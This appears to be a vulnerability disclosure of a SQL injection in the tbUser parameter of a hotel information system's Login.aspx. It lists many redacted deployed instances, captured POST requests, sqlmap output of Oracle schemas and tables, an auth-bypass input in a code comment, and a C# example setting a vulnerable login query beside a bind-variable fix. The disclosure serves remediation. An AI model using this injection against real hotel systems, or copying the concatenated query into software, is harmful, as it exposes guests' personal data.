PS: Are you still worried about the lack of room information?
This system was previously found to use weak passwords, which led to large-scale data leakage; see, for example:
http://**.**/bugs/wooyun-2010-0136212
http://**.**/bugs/wooyun-2010-0136013
http://**.**/bugs/wooyun-2010-0112009
and others.
Beyond that, the hotel information management system (a social platform developed by Beijing Aerospace Gold Shield Technology Co., Ltd.) has a generic SQL injection vulnerability in its login page. The system holds a large amount of information, so the impact is severe.
System architecture: ASPX + Oracle
Vulnerability: SQL injection
Vulnerable file: /Login.aspx
Injection parameter: tbUser
What may have gone unnoticed is how widely this system is deployed, on both intranets and the public Internet. A search turns up many public-facing instances (intranet deployments can be found the same way once inside). Public instances include:
**.**/Hotelbs/default.aspx
**.**/Hotelbs/default.aspx
**.**/Hotelbs/default.aspx
**.**/Hotelbs/default.aspx
http://**.**:8888/hotelbs/default.aspx
**.**:8080/hotelbs/Login.aspx
**.**/Hotelbs/default.aspx
**.**/Hotelbs/default.aspx
**.**/Hotelbs164/default.aspx
**.**:9080/hotelbs164/default.aspx
**.**/Hotelbs/default.aspx
**.**/Hotelbs/default.aspx
**.**/Hotelbs/default.aspx
**.**:9080/hotelbs164/default.aspx
**.**/Hotelbs/default.aspx
http://**.**/default.aspx
**.**.**.**/**.**.**.**/
**.**:8090/hotelbs/Login.aspx
**.**:235/dylg/**.**.**.**/
http://**.**:235/dylgy/login.aspx
**.**:9090/Login.aspx
http://**.**/default.aspx
**.**:88/default.aspx
**.**/Default.aspx
and so on.
Every instance tested was injectable through the same login request.
For example, **.**/hotelbs/Login.aspx:
POST /hotelbs/Login.aspx HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: **.**.**.**/hotelbs/Login.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: **.**.**.**
Content-Length: 854
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=p44xkz2zh14zes45lvc2qsmb

smMain=upTimer|ibtLogin&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE1NjIxNDg0NjUPZBYCAgMPZBYCAgMPZBYCZg9kFgQCAQ9kFgQCAQ8PZBYCHgpvbktleVByZXNzBR1OZXh0Rm9jdXMoZXZlbnQsJ3RiUGFzc3dvcmQnKWQCBQ8PZBYCHwAFXWlmKGV2ZW50LmtleUNvZGU9PTEzKSB7IHZhciBidG5Mb2dpbj1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnaWJ0TG9naW4nKTsgYnRuTG9naW4uY2xpY2soKTsgfWQCAw8PFgIeB1Zpc2libGVoFgIeB29uY2xpY2sFLW9wZW5XaW5kb3dFZHooJ3BvbGljZW1hbmlkY2FyZC5hc3B4P3R5cGU9MScpO2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCGlidExvZ2luF2UlMdPt0ZLKOPUi2%2BGLhhQlGLk%3D&__VIEWSTATEGENERATOR=5C4684BD&__EVENTVALIDATION=%2FwEWCwKxv9GtBgLGvdL3AQKr8tnHBgK3jsrkBAKM54rGBgLL%2FYu6AwKt6sazBAKu4tDbCgLDvJbUCgLvz4aZDgLavZ2gCrFNJVVkLTgGWyyYkOBQZZJkWBdn&tbUser=dasd&tbPassword=dasdsa&hdCert=&hdSSL=&hdSerial=&hdUrl=http%3A%2F%2F**.**.**.**%2Fhotelbs%2F&stationID=&scanType=&ibtLogin.x=28&ibtLogin.y=15
26 databases are reachable (sqlmap reports Oracle schemas as "databases"; the list comes from ALL_USERS, which any account can read, so which of these the application account can actually query depends on its grants):
available databases [26]:
[*] "SYS"
[*] CTXSYS
[*] DBSNMP
[*] DDYSYS
[*] DMSYS
[*] ESJSYS
[*] EXFSYS
[*] FJJSSGYSYS
[*] HOTELBS
[*] JXYSYS
[*] KSYSYS
[*] MANSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SPECIALUSEROUT
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] WTJMYSYS
[*] XDB
[*] YLYSYS
[*] YZYSYS
A large amount of data is stored in the SPECIALUSEROUT schema and in ipvbs.
Database: SPECIALUSEROUT
[19 tables]
+---------------------+
| DATACENTER          |
| DEFUPDATE           |
| DIALPHONE           |
| EXTRACTLOG          |
| FZXX                |
| HOTEL               |
| HOTEL_141           |
| MESSAGE             |
| MSGFEEDBACK         |
| RECEIVELOG          |
| SENDLOG             |
| STATIONLIST         |
| STATIONLIST20150529 |
| STATIONLIST_LL      |
| STATIONLIST_NEW     |
| STATIONLIST_S       |
| STATIONLIST_SS      |
| T2                  |
| T3                  |
+---------------------+
Or, **.**:8080/hotelbs/Login.aspx:
POST /hotelbs/Login.aspx HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: **.**.**.**:8080/hotelbs/Login.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/7.0)
Host: **.**.**.**:8080
Content-Length: 840
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=upqudpeyckpgh3ndankezt3a

smMain=upTimer|ibtLogin&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTM3MjI1OTM0NA9kFgICAw9kFgICAw9kFgJmD2QWBAIBD2QWBAIBDw9kFgIeCm9uS2V5UHJlc3MFHU5leHRGb2N1cyhldmVudCwndGJQYXNzd29yZCcpZAIFDw9kFgIfAAVdaWYoZXZlbnQua2V5Q29kZT09MTMpIHsgdmFyIGJ0bkxvZ2luPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdpYnRMb2dpbicpOyBidG5Mb2dpbi5jbGljaygpOyB9ZAIDDw8WAh4HVmlzaWJsZWgWAh4Hb25jbGljawUtb3BlbldpbmRvd0VkeigncG9saWNlbWFuaWRjYXJkLmFzcHg%2FdHlwZT0xJyk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIaWJ0TG9naW5NivBG5%2Fq0vKzajP8hBaq5VFL%2FoQ%3D%3D&__EVENTVALIDATION=%2FwEWCwK61ri%2BDQLGvdL3AQKr8tnHBgK3jsrkBAKM54rGBgLL%2FYu6AwKt6sazBAKu4tDbCgLDvJbUCgLvz4aZDgLavZ2gCmLVRsrSAJUQLp4Lntals7A%2FzRRb&tbUser=dasdasd&tbPassword=dasdadsads&hdCert=&hdSSL=&hdSerial=&hdUrl=http%3A%2F%2F**.**.**.**%2Fhotelbs%2F&stationID=&scanType=&ibtLogin.x=43&ibtLogin.y=10
Database:
Solution:
The system is very old. Upgrade it, and rewrite the login query to use bind variables (parameterized queries) instead of concatenating tbUser and tbPassword into the SQL text; filtering the input helps only as a second layer and is not a reliable fix on its own. Run the application under a least-privileged Oracle account as well, so that an injection in one page cannot read other schemas.
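To make the fix concrete, the following is an added example (my own illustration, not code from Beijing Aerospace Gold Shield or the hotelbs application) of what a Login.aspx code-behind with this defect typically looks like, beside the corrected version that uses ODP.NET bind variables. Only the control names tbUser, tbPassword and ibtLogin come from the captured request; the USERS table and its columns, the connection string, the lblMessage control and the post-login URL are assumptions.

```csharp
using System;
using System.Web.UI;
using System.Web.UI.WebControls;
using Oracle.ManagedDataAccess.Client;

// Hypothetical code-behind for Login.aspx. Control IDs (tbUser, tbPassword,
// ibtLogin) match the captured request; everything else is assumed.
public partial class Login : Page
{
    // Assumption: the application connects as the HOTELBS schema owner.
    private const string ConnStr =
        "User Id=HOTELBS;Password=changeme;Data Source=localhost:1521/ORCL";

    // VULNERABLE: both text boxes are concatenated straight into the SQL text.
    // With tbUser = x' OR 1=1-- the statement becomes
    //   SELECT COUNT(*) FROM USERS WHERE USERNAME='x' OR 1=1--' AND PASSWORD='...'
    // and everything after "--" is an Oracle comment, so the password check
    // disappears. The same parameter lets sqlmap run arbitrary SELECTs and
    // enumerate every schema visible to the application account, which is
    // exactly what the "available databases [26]" output above shows.
    private bool LoginVulnerable(string user, string pass)
    {
        string sql = "SELECT COUNT(*) FROM USERS WHERE USERNAME='" + user +
                     "' AND PASSWORD='" + pass + "'";
        using (var conn = new OracleConnection(ConnStr))
        using (var cmd = new OracleCommand(sql, conn))
        {
            conn.Open();
            return Convert.ToInt32(cmd.ExecuteScalar()) > 0;
        }
    }

    // FIXED: bind variables. The input is sent to Oracle as a value and is
    // never parsed as SQL, so quotes and comment sequences are inert.
    // (Password comparison is kept as in the vulnerable version so the diff
    // shows only the injection fix; hashing stored passwords is a separate change.)
    private bool LoginFixed(string user, string pass)
    {
        const string sql = "SELECT COUNT(*) FROM USERS " +
                           "WHERE USERNAME = :usr AND PASSWORD = :pwd";
        using (var conn = new OracleConnection(ConnStr))
        using (var cmd = new OracleCommand(sql, conn))
        {
            cmd.BindByName = true;  // match parameters by name, not position
            cmd.Parameters.Add(new OracleParameter("usr", OracleDbType.Varchar2, 64)).Value = user;
            cmd.Parameters.Add(new OracleParameter("pwd", OracleDbType.Varchar2, 128)).Value = pass;
            conn.Open();
            return Convert.ToInt32(cmd.ExecuteScalar()) > 0;
        }
    }

    // ibtLogin is an ImageButton: the captured request carries ibtLogin.x / ibtLogin.y.
    protected void ibtLogin_Click(object sender, ImageClickEventArgs e)
    {
        if (LoginFixed(tbUser.Text, tbPassword.Text))
            Response.Redirect("default.aspx");       // assumed post-login page
        else
            lblMessage.Text = "Login failed.";       // assumed label control
    }
}
```

The only behavioural difference between the two methods is how tbUser reaches the database: as SQL text in LoginVulnerable, as a bound value in LoginFixed. Whether the account behind ConnStr can also read SPECIALUSEROUT or the SYS-owned schemas is a separate grant question, and trimming those grants limits what any remaining injection in another page could reach.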